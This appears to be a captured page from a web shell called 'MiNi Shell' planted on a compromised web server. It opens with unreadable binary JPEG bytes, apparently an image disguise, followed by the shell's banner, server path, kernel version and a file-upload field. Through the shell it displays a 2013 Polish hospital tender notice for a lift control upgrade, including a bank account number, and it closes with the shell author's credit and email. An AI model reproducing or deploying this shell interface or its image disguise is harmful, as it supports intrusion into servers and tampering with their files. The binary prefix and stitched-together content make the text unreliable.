JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/359556-N-2013.html

<p class="kh_header"><b>Poznań: Modernizacja dźwigu polegająca na wymianie sterowania głównego urządzenia wraz z kasetami operacyjnymi.</b><br>
<b>Numer ogłoszenia: 359556 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpsk.am.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dźwigu polegająca na wymianie sterowania głównego urządzenia wraz z kasetami operacyjnymi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> modernizacja dźwigu polegająca na wymianie sterowania głównego urządzenia wraz z kasetami operacyjnymi  (COP, LOP, LIP) obejmująca:
1.	Demontaż istniejącego sterowania urządzenia.
2.	Demontaż układu tyrystorowego.
3.	Demontaż panelu dyspozycji kabiny oraz kaset wezwań i piętrowskazywaczy.
4.	Nowe sterowanie MICONIC MX-GC z falownikiem DR VAB 33 dostosowane do istniejącej wciągarki.
5.	Moduł zapewniający łączność z pogotowiem dźwigowym TAM2-MOD.
6.	Nowy panel dyspozycji kabiny (COP) MX Basic Standard x 2 szt. z blokadą kluczykową.
7.	Nowe kasety wezwań na przystankach (LOP) MX Basic Standard z piętrowskazywaczem (LIP) x 9 szt.
8.	Przygotowanie otworów do montażu kaset wezwań.
9.	Montaż nowych podzespołów urządzenia.
10.	Konfiguracja sterowania / Uruchomienie
11.	Transport / Dostawa.
12.	Utylizacja zdemontowanych podzespołów urządzenia.
13.	Kontrola działania urządzenia przez inspektora UDT po modernizacji.
14.	Przygotowanie dokumentacji oraz wszystkie  uzgodnienia z UDT.
15.	Uzgodnienie dokumentacji z UDT.
16.	Przygotowanie dokumentacji do odbioru urządzenia po modernizacji przez UDT.
17.	Uczestniczenie przy odbiorze urządzenia przez UDT.

Zamawiający dopuszcza zaoferowanie innych materiałów, urządzeń i technologii niż  podane  w pkt. 4-7 pod warunkiem zaproponowania przez Wykonawcę: materiałów, urządzeń i technologii, które posiadają właściwości, cechy, parametry techniczne, oraz wymagania funkcjonalne i estetyczne nie gorsze niż określone w załącznikach do specyfikacji. W takiej sytuacji Zamawiający wymaga aby Wykonawca, który chce zastosować materiały, urządzenia i technologie inne od wskazanych w załącznikach do specyfikacji, wykazał ich równoważność, poprzez dokonanie porównania tabelarycznego parametrów technicznych, jakościowych i estetycznych oraz przez przedłożenie stosownych dokumentów: tj. pełne opisy techniczne rozwiązań równoważnych ( typ, producent, dane katalogowe, DTR - ki) wraz z niezbędnymi atestami i dokumentami  dopuszczającymi stosowanie materiałów w budownictwie. Brak załączenia porównania tabelarycznego, atestów, certyfikatów itp. a także brak wykazania równoważności spowoduje odrzucenie oferty.
Wykonawca przedstawi Zamawiającemu dokument potwierdzający przekazanie  zużytych  urządzeń  do recyklingu  lub  utylizacji   (Karta Przekazania Odpadu) zgodnie z obowiązującymi przepisami.

2.	Wymogi Zamawiającego  w  odniesieniu  do  przedmiotu  zamówienia:
a)	wykonanie robót zgodnie z dokumentacją przetargową, zaleceniami nadzoru inwestorskiego, obowiązującymi normami, 	warunkami technicznymi wykonania robót oraz współczesną wiedzą techniczną 
b)	okresu gwarancji i rękojmi na zrealizowane roboty budowlane wynoszącego nie mniej niż 24 miesiące licząc od daty 	odbioru końcowego robót, 
c)	stosowanie materiałów odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie 	określonym w ustawie o wyrobach budowlanych wraz z aktami wykonawczymi w związku z art. 10 ustawy Prawo 	budowlane ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia  wadium w  kwocie: 1.000,00 zł  (jeden tysiąc  złotych) dla całości zamówienia.  
1.2	Wadium  wnosi  się  przed  upływem   terminu  składania  ofert.
2.	Forma  wadium
2.1	Wadium  może  być  wniesione  w  jednej  lub  kilku  następujących  formach;
a)	pieniądzu;
b)	poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym,
c)	gwarancjach  bankowych;
d)	gwarancjach  ubezpieczeniowych;
e)	poręczeniach  udzielanych  przez  podmioty, o  których  mowa w  art.  6 b  ust. 5  pkt. 2 ustawy  z  dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości  ( Dz. U.  z  2007 r.  Nr  42,  poz. 275 ).
2.2	Z treści gwarancji / poręczenia winno wynikać bezwarunkowe, na każde  pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach  określonych w art. 46  ust. 4a oraz ust. 5  ustawy.
3.	Miejsce  i  sposób  wniesienia  wadium
3.1	Wadium  wnoszone  w  pieniądzu  Wykonawca  wpłaca  przelewem  na  rachunek Zamawiającego:   CITI HANDLOWY SA  07103012470000000087905012.
3.2	W  przypadku  wnoszenia  wadium  w  pozostałych  formach  (wymienionych  w  pkt. 10.2.1) lit. b), c), d), e)  należy  je  złożyć  w  oryginale  w  kasie  Zamawiającego  (pokój  nr  319  w  Budynku  wejście  D 1,  III piętro).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje lub będzie dysponował:
- dwoma osobami posiadającymi odpowiednie  uprawnienia , zgodnie z Dyrektywą Dźwigową 95 16 WE.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji , kiedy będzie posiadał opłaconą  polisę  lub  inny dokument potwierdzający, że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zawartość  oferty  i  sposób  jej  przedstawienia
Ofertę stanowi wypełniony formularz  Oferta,  załącznik  nr  2   do  specyfikacji oraz niżej wymienione dokumenty:
a)    formularz specyfikacji cenowej; załącznik nr  1  do specyfikacji		

Wraz  z  ofertą  należy złożyć:
a)	Oświadczenia i dokumenty  o których mowa    w  rozdziale  VI  specyfikacji,
b)	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.

Oferta  wraz  z  załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie 
z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.

W przypadku wspólnego ubiegania się o udzielenie zamówienia przez  dwóch lub więcej Wykonawców, w ofercie musi zostać złożone  oświadczenie z art. 22  ust. 1 ustawy i podpisane przez tych Wykonawców,  którzy spełniają postawione warunki.

W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, w ofercie  muszą być złożone oświadczenia z art. 24 ust. 1 ustawy  przez każdego z Wykonawców  składających ofertę wspólną lub jedno, podpisane przez wszystkich Wykonawców składających taką ofertę.

Dokumentami potwierdzającymi spełnianie warunków udziału z art. 22 ust. 1 ustawy są: dokumenty złożone przez co najmniej jednego z Wykonawców wspólnie ubiegających  się o udzielenie zamówienia lub dokumenty złożone przez tych Wykonawców, z których wynikać będzie łączne ich  spełnianie. 

Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania Wykonawcy w okolicznościach, o których mowa w 
art. 24 ust. 1 ustawy przedkłada w ofercie każdy z Wykonawców Konsorcjum.

Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  (do oferty dołączyć odpowiednie pełnomocnictwo). 

Pełnomocnictwo może być udzielone w szczególności:
	-  łącznie przez wszystkich Wykonawców ( jeden dokument)
	- oddzielnie przez każdego z nich ( tyle dokumentów ilu Wykonawców)

Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 

Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę  regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a)     określenie celu  gospodarczego,
b) określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c)      oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d)     zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów:
      a)  aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki podatku VAT zgodnie z obowiązującymi przepisami
      b) 	aneks dopuszczający uzasadnioną zmianę w zakresie sposobu wykonania przedmiotu  zamówienia  proponowana przez Zamawiającego lub wykonawcę , jeżeli ta zmiana jest korzystna dla Zamawiającego.
      c) aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.
d)	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego przy ul. Polnej 33 , w pokoju nr 105 - Dział Zamówień Publicznych mieszczący się w Budynku Technicznym Szpitala, wejście E1 lub drogą pocztową.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2013 godzina 09:00, miejsce: Siedziba Zamawiającego przy ul. Polnej 33 , w pokoju nr 317 - Kancelaria Ogólna mieszcząca się w Budynku Wielofunkcyjnym Szpitala, wejście D1 lub drogą pocztową.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com